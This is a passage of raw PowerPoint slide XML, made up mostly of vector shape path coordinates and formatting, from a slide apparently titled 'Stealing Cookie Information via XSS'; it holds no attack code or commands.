                  <a:lnTo>
                    <a:pt x="1258062" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309116" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319956" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1324102" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1324554" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1321339" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306195" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1264666" y="25400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1244653" y="25400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="617601" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461010" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696976" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768096" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240684" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240917" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1244653" y="25400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1243822" y="50800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1102487" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213739" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249793" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1243822" y="50800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1321689" y="25400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1264666" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306195" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352042" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1321689" y="25400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1108456" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="763524" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619379" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251092" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253162" y="22222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221740" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1219708" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1108456" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1253162" y="22222"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1251092" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263650" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253162" y="22222"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1268603" y="12700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1259365" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253162" y="22222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263650" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1320292" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1268603" y="12700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E71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87FC9AE4-F899-9695-E387-779954E4B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836" y="46482"/>
            <a:ext cx="65317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Stealing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Cookie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Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> via XSS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3" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB9329FB-0E63-55F0-F25F-A4C86CF077E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8447531" y="44196"/>
            <a:ext cx="3714115" cy="2496820"/>
            <a:chOff x="8447531" y="44196"/>
            <a:chExt cx="3714115" cy="2496820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="object 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F0581A-759D-8B17-5A05-0C615EEF80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47531" y="44196"/>
              <a:ext cx="3713987" cy="2496312"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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28CA5065-E3D3-AE07-0B03-75C093173089}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10438293" y="1162494"/>
              <a:ext cx="708660" cy="462280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="708659" h="462280">
                  <a:moveTo>
                    <a:pt x="163792" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="120203" y="3692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81952" y="12777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24959" y="47048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="101504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1266" y="133346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29273" y="201954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54906" y="237378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87553" y="272654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126660" y="307109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171673" y="340073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222039" y="370875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277203" y="398843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334418" y="422419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390648" y="440504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445023" y="453118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496674" y="460281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544729" y="462010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588319" y="458325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626573" y="449245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683595" y="414976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708551" y="360517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707257" y="328666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679212" y="260026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653568" y="224583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620913" y="189289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581801" y="154816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536785" y="121838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486419" y="91026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431254" y="63055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374071" y="39514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317860" y="21456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263494" y="8863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211847" y="1717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637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B929DD2D-6042-B228-3D5D-8C601E765155}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10438293" y="1162494"/>
              <a:ext cx="708660" cy="462280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="708659" h="462280">
                  <a:moveTo>
                    <a:pt x="7963" y="72199"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="49913" y="27235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120203" y="3692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163792" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211847" y="1717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263494" y="8863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317860" y="21456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374071" y="39514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431254" y="63055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486419" y="91026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536785" y="121838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581801" y="154816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620913" y="189289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653568" y="224583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679212" y="260026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697293" y="294944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708551" y="360517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700621" y="389826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658622" y="434789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588319" y="458325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544729" y="462010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496674" y="460281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445023" y="453118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390648" y="440504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334418" y="422419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277203" y="398843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222039" y="370875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171673" y="340073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126660" y="307109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87553" y="272654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54906" y="237378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29273" y="201954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11208" y="167053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="101504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7963" y="7219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5D5EB16C-C6CA-4AFC-21B0-65AD58155664}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10609198" y="1264284"/>
              <a:ext cx="349250" cy="254000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="232155" y="199389"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="230124" y="199389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229489" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227965" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227202" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224790" y="207010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223900" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222376" y="212089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221487" y="214629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220725" y="218439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220852" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221233" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222757" y="224789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224154" y="226060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225678" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="231139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232664" y="236220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235584" y="238760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242697" y="243839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="245110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251332" y="247650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264668" y="252729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271399" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284479" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318389" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273430" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267589" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236093" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234823" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233806" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232791" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232155" y="199389"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="298576" y="109220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="292734" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287400" y="110489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281940" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276986" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267970" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264286" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261366" y="133350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258952" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257555" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257428" y="148589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257175" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257809" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260350" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262127" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264541" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266826" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269494" y="180339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272287" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274954" y="186689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277749" y="189229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282955" y="195579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285242" y="198120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287147" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288925" y="204470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290195" y="207010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290829" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291465" y="213360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291083" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288544" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287020" y="223520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283209" y="227329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281050" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278637" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276098" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318389" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319024" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321436" y="223520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322706" y="218439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322960" y="213360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323087" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322452" y="204470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321182" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319785" y="195579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318007" y="191770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315595" y="189229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310515" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307721" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304926" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302259" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299466" y="168910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296799" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294512" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292607" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290575" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289432" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288798" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288162" y="148589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288544" y="146050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289814" y="143510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290702" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291973" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295021" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296799" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298830" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347218" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343916" y="130810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342010" y="128270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337311" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334645" y="123189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331850" y="120650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328929" y="119379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325881" y="116839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316737" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298576" y="109220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="135381" y="154939"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="131064" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130301" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129667" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128904" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127380" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126492" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125475" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124078" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123190" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123444" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124332" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125856" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127253" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129285" y="185420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131825" y="187960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152907" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159639" y="205739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166370" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173100" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179704" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186054" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192024" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220196" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175132" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169291" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166116" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162941" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157987" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153924" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150622" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147447" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144779" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140589" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138937" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137668" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136525" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135381" y="154939"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="200151" y="64770"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="194436" y="64770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183642" y="67310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159130" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159003" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159384" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171069" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176656" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181991" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184657" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186944" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188722" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190626" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192531" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193167" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192785" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191389" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190246" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188722" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184911" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182625" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177800" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220196" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220725" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223139" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224408" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224626" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224535" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224154" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222757" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221487" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219582" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214756" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212090" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209423" y="133350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201168" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198374" y="120650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196087" y="118110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192277" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191007" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189737" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190119" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191516" y="97789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192404" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193548" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196596" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198374" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202437" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248094" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245618" y="85089"/>
                  </a:lnTo>
                  <a:lnTo>
